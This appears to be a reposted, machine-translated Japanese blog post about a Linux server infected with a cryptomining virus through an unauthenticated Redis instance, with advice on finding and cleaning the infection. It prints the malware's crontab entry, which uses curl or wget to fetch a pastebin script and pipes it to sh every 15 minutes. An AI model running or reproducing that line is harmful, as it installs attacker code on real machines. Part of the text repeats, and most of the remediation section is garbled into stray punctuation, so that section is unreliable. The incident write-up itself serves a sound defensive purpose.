Linuxサーバがredisの脆弱性による鉱山ウイルスの侵入を記録します.
1486 ワード
中毒原因は、redis bind 0.0.0.0でパスワードがなく、安全意識が弱い.
だから、redisは必ずパスワードを設定して、ポートを変更して、rootユーザーで起動しないでください、もし業務が必要でないならば、bind 0.0.0.0!!!
このウイルスは横方向に伝播するので、外網redisのポートが通じなければ大丈夫だとは思わないでください.内部ネットワークに機械がウイルスに感染すれば、感染を続けることができます.
病気:CPUが不明プロセスで満タン.
このウイルスは主に、crontabタイミングタスクを通じて、指定されたサイトにスクリプトをダウンロードし、掘削を実行します.
crontab-lで見ることができます
転載先:https://www.cnblogs.com/undefined-j/p/10702019.html
だから、redisは必ずパスワードを設定して、ポートを変更して、rootユーザーで起動しないでください、もし業務が必要でないならば、bind 0.0.0.0!!!
このウイルスは横方向に伝播するので、外網redisのポートが通じなければ大丈夫だとは思わないでください.内部ネットワークに機械がウイルスに感染すれば、感染を続けることができます.
病気:CPUが不明プロセスで満タン.
このウイルスは主に、crontabタイミングタスクを通じて、指定されたサイトにスクリプトをダウンロードし、掘削を実行します.
crontab-lで見ることができます
*/15 * * * * (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh
crontab -r crontab -e , 。
, linux , ps。
:
1. linux iptables, ip 。 , CPU 。 redis 。
2. .ssh , 。 , , , ssh
3. , 。github :https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool
4. ,linux ps , ps -ef kerberods , , , 。
5. , crontab 。 , /var/spool/cron/ , /var/spool/cron/crontabs/ /etc/cron.d/ , , linux anacron cron, crontab 。
, , ps (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh 。 ,,,,,,
, 。redis bind 0.0.0.0 bind , , redis, redis 。
PS: , , 。
strace -o output.txt -T -f -ff -tt -e trace=all -p PID
転載先:https://www.cnblogs.com/undefined-j/p/10702019.html